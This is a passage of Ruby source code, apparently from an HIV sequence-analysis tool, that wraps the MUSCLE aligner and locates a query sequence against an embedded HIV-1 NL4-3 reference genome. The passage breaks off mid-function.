"def muscle_sequence(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return aln_seq\nend",
"def NL43_locator(seq=\"\",temp_dir=File.dirname($0))\n hxb2_ref = \"TGGAAGGGCTAATTTGGTCCCAAAAAAGACAAGAGATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTGGCAGAACTACACACCAGGGCCAGGGATCAGATATCCACTGACCTTTGGATGGTGCTTCAAGTTAGTACCAGTTGAACCAGAGCAAGTAGAAGAGGCCAAATAAGGAGAGAAGAACAGCTTGTTACACCCTATGAGCCAGCATGGGATGGAGGACCCGGAGGGAGAAGTATTAGTGTGGAAGTTTGACAGCCTCCTAGCATTTCGTCACATGGCCCGAGAGCTGCATCCGGAGTACTACAAAGACTGCTGACATCGAGCTTTCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGTGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATGCTACATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTCAAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCAGTGGCGCCCGAACAGGGACTTGAAAGCGAAAGTAAAGCCAGAGGAGATCTCTCGACGCAGGACTCGGCTTGCTGAAGCGCGCACGGCAAGAGGCGAGGGGCGGCGACTGGTGAGTACGCCAAAAATTTTGACTAGCGGAGGCTAGAAGGAGAGAGATGGGTGCGAGAGCGTCGGTATTAAGCGGGGGAGAATTAGATAAATGGGAAAAAATTCGGTTAAGGCCAGGGGGAAAGAAACAATATAAACTAAAACATATAGTATGGGCAAGCAGGGAGCTAGAACGATTCGCAGTTAATCCTGGCCTTTTAGAGACATCAGAAGGCTGTAGACAAATACTGGGACAGCTACAACCATCCCTTCAGACAGGATCAGAAGAACTTAGATCATTATATAATACAATAGCAGTCCTCTATTGTGTGCATCAAAGGATAGATGTAAAAGACACCAAGGAAGCCTTAGATAAGATAGAGGAAGAGCAAAACAAAAGTAAGAAAAAGGCACAGCAAGCAGCAGCTGACACAGGAAACAACAGCCAGGTCAGCCAAAATTACCCTATAGTGCAGAACCTCCAGGGGCAAATGGTACATCAGGCCATATCACCTAGAACTTTAAATGCATGGGTAAAAGTAGTAGAAGAGAAGGCTTTCAGCCCAGAAGTAATACCCATGTTTTCAGCATTATCAGAAGGAGCCACCCCACAAGATTTAAATACCATGCTAAACACAGTGGGGGGACATCAAGCAGCCATGCAAATGTTAAAAGAGACCATCAATGAGGAAGCTGCAGAATGGGATAGATTGCATCCAGTGCATGCAGGGCCTATTGCACCAGGCCAGATGAGAGAACCAAGGGGAAGTGACATAGCAGGAACTACTAGTACCCTTCAGGAACAAATAGGATGGATGACACATAATCCACCTATCCCAGTAGGAGAAATCTATAAAAGATGGATAATCCTGGGATTAAATAAAATAGTAAGAATGTATAGCCCTACCAGCATTCTGGACATAAGACAAGGACCAAAGGAACCCTTTAGAGACTATGTAGACCGATTCTATAAAACTCTAAGAGCCGAGCAAGCTTCACAAGAGGTAAAAAATTGGATGACAGAAACCTTGTTGGTCCAAAATGCGAACCCAGATTGTAAGACTATTTTAAAAGCATTGGGACCAGGAGCGACACTAGAAGAAATGATGACAGCATGTCAGGGAGTGGGGGGACCCGGCCATAAAGCAAGAGTTTTGGCTGAAGCAATGAGCCAAGTAACAAATCCAGCTACCATAATGATACAGAAAGGCAATTTTAGGAACCAAAGAAAGACTGTTAAGTGTTTCAATTGTGGCAAAGAAGGGCACATAGCCAAAAATTGCAGGGCCCCTAGGAAAAAGGGCTGTTGGAAATGTGGAAAGGAAGGACACCAAATGAAAGATTGTACTGAGAGACAGGCTAATTTTTTAGGGAAGATCTGGCCTTCCCACAAGGGAAGGCCAGGGAATTTTCTTCAGAGCAGACCAGAGCCAACAGCCCCACCAGAAGAGAGCTTCAGGTTTGGGGAAGAGACAACAACTCCCTCTCAGAAGCAGGAGCCGATAGACAAGGAACTGTATCCTTTAGCTTCCCTCAGATCACTCTTTGGCAGCGACCCCTCGTCACAATAAAGATAGGGGGGCAATTAAAGGAAGCTCTATTAGATACAGGAGCAGATGATACAGTATTAGAAGAAATGAATTTGCCAGGAAGATGGAAACCAAAAATGATAGGGGGAATTGGAGGTTTTATCAAAGTAAGACAGTATGATCAGATACTCATAGAAATCTGCGGACATAAAGCTATAGGTACAGTATTAGTAGGACCTACACCTGTCAACATAATTGGAAGAAATCTGTTGACTCAGATTGGCTGCACTTTAAATTTTCCCATTAGTCCTATTGAGACTGTACCAGTAAAATTAAAGCCAGGAATGGATGGCCCAAAAGTTAAACAATGGCCATTGACAGAAGAAAAAATAAAAGCATTAGTAGAAATTTGTACAGAAATGGAAAAGGAAGGAAAAATTTCAAAAATTGGGCCTGAAAATCCATACAATACTCCAGTATTTGCCATAAAGAAAAAAGACAGTACTAAATGGAGAAAATTAGTAGATTTCAGAGAACTTAATAAGAGAACTCAAGATTTCTGGGAAGTTCAATTAGGAATACCACATCCTGCAGGGTTAAAACAGAAAAAATCAGTAACAGTACTGGATGTGGGCGATGCATATTTTTCAGTTCCCTTAGATAAAGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCACAGGGATGGAAAGGATCACCAGCAATATTCCAGTGTAGCATGACAAAAATCTTAGAGCCTTTTAGAAAACAAAATCCAGACATAGTCATCTATCAATACATGGATGATTTGTATGTAGGATCTGACTTAGAAATAGGGCAGCATAGAACAAAAATAGAGGAACTGAGACAACATCTGTTGAGGTGGGGATTTACCACACCAGACAAAAAACATCAGAAAGAACCTCCATTCCTTTGGATGGGTTATGAACTCCATCCTGATAAATGGACAGTACAGCCTATAGTGCTGCCAGAAAAGGACAGCTGGACTGTCAATGACATACAGAAATTAGTGGGAAAATTGAATTGGGCAAGTCAGATTTATGCAGGGATTAAAGTAAGGCAATTATGTAAACTTCTTAGGGGAACCAAAGCACTAACAGAAGTAGTACCACTAACAGAAGAAGCAGAGCTAGAACTGGCAGAAAACAGGGAGATTCTAAAAGAACCGGTACATGGAGTGTATTATGACCCATCAAAAGACTTAATAGCAGAAATACAGAAGCAGGGGCAAGGCCAATGGACATATCAAATTTATCAAGAGCCATTTAAAAATCTGAAAACAGGAAAATATGCAAGAATGAAGGGTGCCCACACTAATGATGTGAAACAATTAACAGAGGCAGTACAAAAAATAGCCACAGAAAGCATAGTAATATGGGGAAAGACTCCTAAATTTAAATTACCCATACAAAAGGAAACATGGGAAGCATGGTGGACAGAGTATTGGCAAGCCACCTGGATTCCTGAGTGGGAGTTTGTCAATACCCCTCCCTTAGTGAAGTTATGGTACCAGTTAGAGAAAGAACCCATAATAGGAGCAGAAACTTTCTATGTAGATGGGGCAGCCAATAGGGAAACTAAATTAGGAAAAGCAGGATATGTAACTGACAGAGGAAGACAAAAAGTTGTCCCCCTAACGGACACAACAAATCAGAAGACTGAGTTACAAGCAATTCATCTAGCTTTGCAGGATTCGGGATTAGAAGTAAACATAGTGACAGACTCACAATATGCATTGGGAATCATTCAAGCACAACCAGATAAGAGTGAATCAGAGTTAGTCAGTCAAATAATAGAGCAGTTAATAAAAAAGGAAAAAGTCTACCTGGCATGGGTACCAGCACACAAAGGAATTGGAGGAAATGAACAAGTAGATGGGTTGGTCAGTGCTGGAATCAGGAAAGTACTATTTTTAGATGGAATAGATAAGGCCCAAGAAGAACATGAGAAATATCACAGTAATTGGAGAGCAATGGCTAGTGATTTTAACCTACCACCTGTAGTAGCAAAAGAAATAGTAGCCAGCTGTGATAAATGTCAGCTAAAAGGGGAAGCCATGCATGGACAAGTAGACTGTAGCCCAGGAATATGGCAGCTAGATTGTACACATTTAGAAGGAAAAGTTATCTTGGTAGCAGTTCATGTAGCCAGTGGATATATAGAAGCAGAAGTAATTCCAGCAGAGACAGGGCAAGAAACAGCATACTTCCTCTTAAAATTAGCAGGAAGATGGCCAGTAAAAACAGTACATACAGACAATGGCAGCAATTTCACCAGTACTACAGTTAAGGCCGCCTGTTGGTGGGCGGGGATCAAGCAGGAATTTGGCATTCCCTACAATCCCCAAAGTCAAGGAGTAATAGAATCTATGAATAAAGAATTAAAGAAAATTATAGGACAGGTAAGAGATCAGGCTGAACATCTTAAGACAGCAGTACAAATGGCAGTATTCATCCACAATTTTAAAAGAAAAGGGGGGATTGGGGGGTACAGTGCAGGGGAAAGAATAGTAGACATAATAGCAACAGACATACAAACTAAAGAATTACAAAAACAAATTACAAAAATTCAAAATTTTCGGGTTTATTACAGGGACAGCAGAGATCCAGTTTGGAAAGGACCAGCAAAGCTCCTCTGGAAAGGTGAAGGGGCAGTAGTAATACAAGATAATAGTGACATAAAAGTAGTGCCAAGAAGAAAAGCAAAGATCATCAGGGATTATGGAAAACAGATGGCAGGTGATGATTGTGTGGCAAGTAGACAGGATGAGGATTAACACATGGAAAAGATTAGTAAAACACCATATGTATATTTCAAGGAAAGCTAAGGACTGGTTTTATAGACATCACTATGAAAGTACTAATCCAAAAATAAGTTCAGAAGTACACATCCCACTAGGGGATGCTAAATTAGTAATAACAACATATTGGGGTCTGCATACAGGAGAAAGAGACTGGCATTTGGGTCAGGGAGTCTCCATAGAATGGAGGAAAAAGAGATATAGCACACAAGTAGACCCTGACCTAGCAGACCAACTAATTCATCTGCACTATTTTGATTGTTTTTCAGAATCTGCTATAAGAAATACCATATTAGGACGTATAGTTAGTCCTAGGTGTGAATATCAAGCAGGACATAACAAGGTAGGATCTCTACAGTACTTGGCACTAGCAGCATTAATAAAACCAAAACAGATAAAGCCACCTTTGCCTAGTGTTAGGAAACTGACAGAGGACAGATGGAACAAGCCCCAGAAGACCAAGGGCCACAGAGGGAGCCATACAATGAATGGACACTAGAGCTTTTAGAGGAACTTAAGAGTGAAGCTGTTAGACATTTTCCTAGGATATGGCTCCATAACTTAGGACAACATATCTATGAAACTTACGGGGATACTTGGGCAGGAGTGGAAGCCATAATAAGAATTCTGCAACAACTGCTGTTTATCCATTTCAGAATTGGGTGTCGACATAGCAGAATAGGCGTTACTCGACAGAGGAGAGCAAGAAATGGAGCCAGTAGATCCTAGACTAGAGCCCTGGAAGCATCCAGGAAGTCAGCCTAAAACTGCTTGTACCAATTGCTATTGTAAAAAGTGTTGCTTTCATTGCCAAGTTTGTTTCATGACAAAAGCCTTAGGCATCTCCTATGGCAGGAAGAAGCGGAGACAGCGACGAAGAGCTCATCAGAACAGTCAGACTCATCAAGCTTCTCTATCAAAGCAGTAAGTAGTACATGTAATGCAACCTATAATAGTAGCAATAGTAGCATTAGTAGTAGCAATAATAATAGCAATAGTTGTGTGGTCCATAGTAATCATAGAATATAGGAAAATATTAAGACAAAGAAAAATAGACAGGTTAATTGATAGACTAATAGAAAGAGCAGAAGACAGTGGCAATGAGAGTGAAGGAGAAGTATCAGCACTTGTGGAGATGGGGGTGGAAATGGGGCACCATGCTCCTTGGGATATTGATGATCTGTAGTGCTACAGAAAAATTGTGGGTCACAGTCTATTATGGGGTACCTGTGTGGAAGGAAGCAACCACCACTCTATTTTGTGCATCAGATGCTAAAGCATATGATACAGAGGTACATAATGTTTGGGCCACACATGCCTGTGTACCCACAGACCCCAACCCACAAGAAGTAGTATTGGTAAATGTGACAGAAAATTTTAACATGTGGAAAAATGACATGGTAGAACAGATGCATGAGGATATAATCAGTTTATGGGATCAAAGCCTAAAGCCATGTGTAAAATTAACCCCACTCTGTGTTAGTTTAAAGTGCACTGATTTGAAGAATGATACTAATACCAATAGTAGTAGCGGGAGAATGATAATGGAGAAAGGAGAGATAAAAAACTGCTCTTTCAATATCAGCACAAGCATAAGAGATAAGGTGCAGAAAGAATATGCATTCTTTTATAAACTTGATATAGTACCAATAGATAATACCAGCTATAGGTTGATAAGTTGTAACACCTCAGTCATTACACAGGCCTGTCCAAAGGTATCCTTTGAGCCAATTCCCATACATTATTGTGCCCCGGCTGGTTTTGCGATTCTAAAATGTAATAATAAGACGTTCAATGGAACAGGACCATGTACAAATGTCAGCACAGTACAATGTACACATGGAATCAGGCCAGTAGTATCAACTCAACTGCTGTTAAATGGCAGTCTAGCAGAAGAAGATGTAGTAATTAGATCTGCCAATTTCACAGACAATGCTAAAACCATAATAGTACAGCTGAACACATCTGTAGAAATTAATTGTACAAGACCCAACAACAATACAAGAAAAAGTATCCGTATCCAGAGGGGACCAGGGAGAGCATTTGTTACAATAGGAAAAATAGGAAATATGAGACAAGCACATTGTAACATTAGTAGAGCAAAATGGAATGCCACTTTAAAACAGATAGCTAGCAAATTAAGAGAACAATTTGGAAATAATAAAACAATAATCTTTAAGCAATCCTCAGGAGGGGACCCAGAAATTGTAACGCACAGTTTTAATTGTGGAGGGGAATTTTTCTACTGTAATTCAACACAACTGTTTAATAGTACTTGGTTTAATAGTACTTGGAGTACTGAAGGGTCAAATAACACTGAAGGAAGTGACACAATCACACTCCCATGCAGAATAAAACAATTTATAAACATGTGGCAGGAAGTAGGAAAAGCAATGTATGCCCCTCCCATCAGTGGACAAATTAGATGTTCATCAAATATTACTGGGCTGCTATTAACAAGAGATGGTGGTAATAACAACAATGGGTCCGAGATCTTCAGACCTGGAGGAGGCGATATGAGGGACAATTGGAGAAGTGAATTATATAAATATAAAGTAGTAAAAATTGAACCATTAGGAGTAGCACCCACCAAGGCAAAGAGAAGAGTGGTGCAGAGAGAAAAAAGAGCAGTGGGAATAGGAGCTTTGTTCCTTGGGTTCTTGGGAGCAGCAGGAAGCACTATGGGCTGCACGTCAATGACGCTGACGGTACAGGCCAGACAATTATTGTCTGATATAGTGCAGCAGCAGAACAATTTGCTGAGGGCTATTGAGGCGCAACAGCATCTGTTGCAACTCACAGTCTGGGGCATCAAACAGCTCCAGGCAAGAATCCTGGCTGTGGAAAGATACCTAAAGGATCAACAGCTCCTGGGGATTTGGGGTTGCTCTGGAAAACTCATTTGCACCACTGCTGTGCCTTGGAATGCTAGTTGGAGTAATAAATCTCTGGAACAGATTTGGAATAACATGACCTGGATGGAGTGGGACAGAGAAATTAACAATTACACAAGCTTAATACACTCCTTAATTGAAGAATCGCAAAACCAGCAAGAAAAGAATGAACAAGAATTATTGGAATTAGATAAATGGGCAAGTTTGTGGAATTGGTTTAACATAACAAATTGGCTGTGGTATATAAAATTATTCATAATGATAGTAGGAGGCTTGGTAGGTTTAAGAATAGTTTTTGCTGTACTTTCTATAGTGAATAGAGTTAGGCAGGGATATTCACCATTATCGTTTCAGACCCACCTCCCAATCCCGAGGGGACCCGACAGGCCCGAAGGAATAGAAGAAGAAGGTGGAGAGAGAGACAGAGACAGATCCATTCGATTAGTGAACGGATCCTTAGCACTTATCTGGGACGATCTGCGGAGCCTGTGCCTCTTCAGCTACCACCGCTTGAGAGACTTACTCTTGATTGTAACGAGGATTGTGGAACTTCTGGGACGCAGGGGGTGGGAAGCCCTCAAATATTGGTGGAATCTCCTACAGTATTGGAGTCAGGAACTAAAGAATAGTGCTGTTAACTTGCTCAATGCCACAGCCATAGCAGTAGCTGAGGGGACAGATAGGGTTATAGAAGTATTACAAGCAGCTTATAGAGCTATTCGCCACATACCTAGAAGAATAAGACAGGGCTTGGAAAGGATTTTGCTATAAGATGGGTGGCAAGTGGTCAAAAAGTAGTGTGATTGGATGGCCTGCTGTAAGGGAAAGAATGAGACGAGCTGAGCCAGCAGCAGATGGGGTGGGAGCAGTATCTCGAGACCTAGAAAAACATGGAGCAATCACAAGTAGCAATACAGCAGCTAACAATGCTGCTTGTGCCTGGCTAGAAGCACAAGAGGAGGAAGAGGTGGGTTTTCCAGTCACACCTCAGGTACCTTTAAGACCAATGACTTACAAGGCAGCTGTAGATCTTAGCCACTTTTTAAAAGAAAAGGGGGGACTGGAAGGGCTAATTCACTCCCAAAGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTGGCAGAACTACACACCAGGGCCAGGGGTCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGATAAGGTAGAAGAGGCCAATAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGAATGGATGACCCTGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACGTGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATGCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCACCCAGGAGGTAGAGGTTGCAGTGAGCCAAGATCGCGCCACTGCATTCCAGCCTGGGCAAGAAAACAAGACTGTCTAAAATAATAATAATAAGTTAAGGGTATTAAATATATTTATACATGGAGGTCATAAAAATATATATATTTGGGCTGGGCGCAGTGGCTCACACCTGCGCCCGGCCCTTTGGGAGGCCGAGGCAGGTGGATCACCTGAGTTTGGGAGTTCCAGACCAGCCTGACCAACATGGAGAAACCCCTTCTCTGTGTATTTTTAGTAGATTTTATTTTATGTGTATTTTATTCACAGGTATTTCTGGAAAACTGAAACTGTTTTTCCTCTACTCTGATACCACAAGAATCATCAGCACAGAGGAAGACTTCTGTGATCAAATGTGGTGGGAGAGGGAGGTTTTCACCAGCACATGAGCAGTCAGTTCTGCCGCAGACTCGGCGGGTGTCCTTCGGTTCAGTTCCAACACCGCCTGCCTGGAGAGAGGTCAGACCACAGGGTGAGGGCTCAGTCCCCAAGACATAAACACCCAAGACATAAACACCCAACAGGTCCACCCCGCCTGCTGCCCAGGCAGAGCCGATTCACCAAGACGGGAATTAGGATAGAGAAAGAGTAAGTCACACAGAGCCGGCTGTGCGGGAGAACGGAGTTCTATTATGACTCAAATCAGTCTCCCCAAGCATTCGGGGATCAGAGTTTTTAAGGATAACTTAGTGTGTAGGGGGCCAGTGAGTTGGAGATGAAAGCGTAGGGAGTCGAAGGTGTCCTTTTGCGCCGAGTCAGTTCCTGGGTGGGGGCCACAAGATCGGATGAGCCAGTTTATCAATCCGGGGGTGCCAGCTGATCCATGGAGTGCAGGGTCTGCAAAATATCTCAAGCACTGATTGATCTTAGGTTTTACAATAGTGATGTTACCCCAGGAACAATTTGGGGAAGGTCAGAATCTTGTAGCCTGTAGCTGCATGACTCCTAAACCATAATTTCTTTTTTGTTTTTTTTTTTTTATTTTTGAGACAGGGTCTCACTCTGTCACCTAGGCTGGAGTGCAGTGGTGCAATCACAGCTCACTGCAGCCTCAACGTCGTAAGCTCAAGCGATCCTCCCACCTCAGCCTGCCTGGTAGCTGAGACTACAAGCGACGCCCCAGTTAATTTTTGTATTTTTGGTAGAGGCAGCGTTTTGCCGTGTGGCCCTGGCTGGTCTCGAACTCCTGGGCTCAAGTGATCCAGCCTCAGCCTCCCAAAGTGCTGGGACAACCGGGCCCAGTCACTGCACCTGGCCCTAAACCATAATTTCTAATCTTTTGGCTAATTTGTTAGTCCTACAAAGGCAGTCTAGTCCCCAGCAAAAAGGGGGTTTGTTTCGGGAAAGGGCTGTTACTGTCTTTGTTTCAAACTATAAACTAAGTTCCTCCTAAACTTAGTTCGGCCTACACCCAGGAATGAACAAGGAGAGCTTGGAGGTTAGAAGCACGATGGAATTGGTTAGGTCAGATCTCTTTCACTGTCTGAGTTATAATTTTGCAATGGTGGTTCAAAGACTGCCCGCTTCTGACACCAGTCGCTGCATTAATGAATCGGCCAACGCGCGGGGAGAGGCGGTTTGCGTATTGGGCGCTCTTCCGCTTCCTCGCTCACTGACTCGCTGCGCTCGGTCGTTCGGCTGCGGCGAGCGGTATCAGCTCACTCAAAGGCGGTAATACGGTTATCCACAGAATCAGGGGATAACGCAGGAAAGAACATGTGAGCAAAAGGCCAGCAAAAGGCCAGGAACCGTAAAAAGGCCGCGTTGCTGGCGTTTTTCCATAGGCTCCGCCCCCCTGACGAGCATCACAAAAATCGACGCTCAAGTCAGAGGTGGCGAAACCCGACAGGACTATAAAGATACCAGGCGTTTCCCCCTGGAAGCTCCCTCGTGCGCTCTCCTGTTCCGACCCTGCCGCTTACCGGATACCTGTCCGCCTTTCTCCCTTCGGGAAGCGTGGCGCTTTCTCATAGCTCACGCTGTAGGTATCTCAGTTCGGTGTAGGTCGTTCGCTCCAAGCTGGGCTGTGTGCACGAACCCCCCGTTCAGCCCGACCGCTGCGCCTTATCCGGTAACTATCGTCTTGAGTCCAACCCGGTAAGACACGACTTATCGCCACTGGCAGCAGCCACTGGTAACAGGATTAGCAGAGCGAGGTATGTAGGCGGTGCTACAGAGTTCTTGAAGTGGTGGCCTAACTACGGCTACACTAGAAGGACAGTATTTGGTATCTGCGCTCTGCTGAAGCCAGTTACCTTCGGAAAAAGAGTTGGTAGCTCTTGATCCGGCAAACAAACCACCGCTGGTAGCGGTGGTTTTTTTGTTTGCAAGCAGCAGATTACGCGCAGAAAAAAAGGATCTCAAGAAGATCCTTTGATCTTTTCTACGGGGTCTGACGCTCAGTGGAACGAAAACTCACGTTAAGGGATTTTGGTCATGAGATTATCAAAAAGGATCTTCACCTAGATCCTTTTAAATTAAAAATGAAGTTTTAAATCAATCTAAAGTATATATGAGTAAACTTGGTCTGACAGTTACCAATGCTTAATCAGTGAGGCACCTATCTCAGCGATCTGTCTATTTCGTTCATCCATAGTTGCCTGACTCCCCGTCGTGTAGATAACTACGATACGGGAGGGCTTACCATCTGGCCCCAGTGCTGCAATGATACCGCGAGACCCACGCTCACCGGCTCCAGATTTATCAGCAATAAACCAGCCAGCCGGAAGGGCCGAGCGCAGAAGTGGTCCTGCAACTTTATCCGCCTCCATCCAGTCTATTAATTGTTGCCGGGAAGCTAGAGTAAGTAGTTCGCCAGTTAATAGTTTGCGCAACGTTGTTGCCATTGCTACAGGCATCGTGGTGTCACGCTCGTCGTTTGGTATGGCTTCATTCAGCTCCGGTTCCCAACGATCAAGGCGAGTTACATGATCCCCCATGTTGTGCAAAAAAGCGGTTAGCTCCTTCGGTCCTCCGATCGTTGTCAGAAGTAAGTTGGCCGCAGTGTTATCACTCATGGTTATGGCAGCACTGCATAATTCTCTTACTGTCATGCCATCCGTAAGATGCTTTTCTGTGACTGGTGAGTACTCAACCAAGTCATTCTGAGAATAGTGTATGCGGCGACCGAGTTGCTCTTGCCCGGCGTCAATACGGGATAATACCGCGCCACATAGCAGAACTTTAAAAGTGCTCATCATTGGAAAACGTTCTTCGGGGCGAAAACTCTCAAGGATCTTACCGCTGTTGAGATCCAGTTCGATGTAACCCACTCGTGCACCCAACTGATCTTCAGCATCTTTTACTTTCACCAGCGTTTCTGGGTGAGCAAAAACAGGAAGGCAAAATGCCGCAAAAAAGGGAATAAGGGCGACACGGAAATGTTGAATACTCATACTCTTCCTTTTTCAATATTATTGAAGCATTTATCAGGGTTATTGTCTCATGAGCGGATACATATTTGAATGTATTTAGAAAAATAAACAAATAGGGGTTCCGCGCACATTTCCCCGAAAAGTGCCACCTGACGTCTAAGAAACCATTATTATCATGACATTAACCTATAAAAATAGGCGTATCACGAGGCCCTTTCGTCTCGCGCGTTTCGGTGATGACGGTGAAAACCTCTGACACATGCAGCTCCCGGAGACGGTCACAGCTTGTCTGTAAGCGGATGCCGGGAGCAGACAAGCCCGTCAGGGCGCGTCAGCGGGTGTTGGCGGGTGTCGGGGCTGGCTTAACTATGCGGCATCAGAGCAGATTGTACTGAGAGTGCACCATATGCGGTGTGAAATACCGCACAGATGCGTAAGGAGAAAATACCGCATCAGGCGCCATTCGCCATTCAGGCTGCGCAACTGTTGGGAAGGGCGATCGGTGCGGGCCTCTTCGCTATTACGCCAGGGGAGGCAGAGATTGCAGTAAGCTGAGATCGCAGCACTGCACTCCAGCCTGGGCGACAGAGTAAGACTCTGTCTCAAAAATAAAATAAATAAATCAATCAGATATTCCAATCTTTTCCTTTATTTATTTATTTATTTTCTATTTTGGAAACACAGTCCTTCCTTATTCCAGAATTACACATATATTCTATTTTTCTTTATATGCTCCAGTTTTTTTTAGACCTTCACCTGAAATGTGTGTATACAAAATCTAGGCCAGTCCAGCAGAGCCTAAAGGTAAAAAATAAAATAATAAAAAATAAATAAAATCTAGCTCACTCCTTCACATCAAAATGGAGATACAGCTGTTAGCATTAAATACCAAATAACCCATCTTGTCCTCAATAATTTTAAGCGCCTCTCTCCACCACATCTAACTCCTGTCAAAGGCATGTGCCCCTTCCGGGCGCTCTGCTGTGCTGCCAACCAACTGGCATGTGGACTCTGCAGGGTCCCTAACTGCCAAGCCCCACAGTGTGCCCTGAGGCTGCCCCTTCCTTCTAGCGGCTGCCCCCACTCGGCTTTGCTTTCCCTAGTTTCAGTTACTTGCGTTCAGCCAAGGTCTGAAACTAGGTGCGCACAGAGCGGTAAGACTGCGAGAGAAAGAGACCAGCTTTACAGGGGGTTTATCACAGTGCACCCTGACAGTCGTCAGCCTCACAGGGGGTTTATCACATTGCACCCTGACAGTCGTCAGCCTCACAGGGGGTTTATCACAGTGCACCCTTACAATCATTCCATTTGATTCACAATTTTTTTAGTCTCTACTGTGCCTAACTTGTAAGTTAAATTTGATCAGAGGTGTGTTCCCAGAGGGGAAAACAGTATATACAGGGTTCAGTACTATCGCATTTCAGGCCTCCACCTGGGTCTTGGAATGTGTCCCCCGAGGGGTGATGACTACCTCAGTTGGATCTCCACAGGTCACAGTGACACAAGATAACCAAGACACCTCCCAAGGCTACCACAATGGGCCGCCCTCCACGTGCACATGGCCGGAGGAACTGCCATGTCGGAGGTGCAAGCACACCTGCGCATCAGAGTCCTTGGTGTGGAGGGAGGGACCAGCGCAGCTTCCAGCCATCCACCTGATGAACAGAACCTAGGGAAAGCCCCAGTTCTACTTACACCAGGAAAGGC\"\n hxb2_l = hxb2_ref.size\n head = \"\"\n 8.times {head << (65 + rand(25)).chr}\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n\n l1 = 0\n l2 = 0\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts hxb2_ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n if ref_size > 1.3*(seq.size)\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n max_seq = aln_test2.scan(/[ACGT]+/).max_by(&:length)\n aln_test2 =~ /#{max_seq}/\n before_aln_seq = $`\n before_aln = $`.size\n post_aln_seq = $'\n post_aln = $'.size\n before_aln_seq_size = before_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b1 = (1.3 * before_aln_seq_size).to_i\n post_aln_seq_size = post_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b2 = (1.3 * post_aln_seq_size).to_i\n if (before_aln > seq.size) and (post_aln <= seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1)]\n l1 = l1 + (before_aln - b1)\n elsif (post_aln > seq.size) and (before_aln <= seq.size)\n ref = ref[before_aln..(ref_size - post_aln - 1 + b2)]\n l2 = l2 + post_aln - b2\n elsif (post_aln > seq.size) and (before_aln > seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1 + b2)]\n l1 = l1 + (before_aln - b1)\n l2 = l2 + (post_aln - b2)\n end\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n end\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n\n if g1 == g2 and (s1 + g1 + s2) == ref.size\n if s1 > s2 and g2 > 2*s2\n ref = ref[0..(-g2-1)]\n repeat = 1\n l2 = l2 + g2\n elsif s1 < s2 and g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n else\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 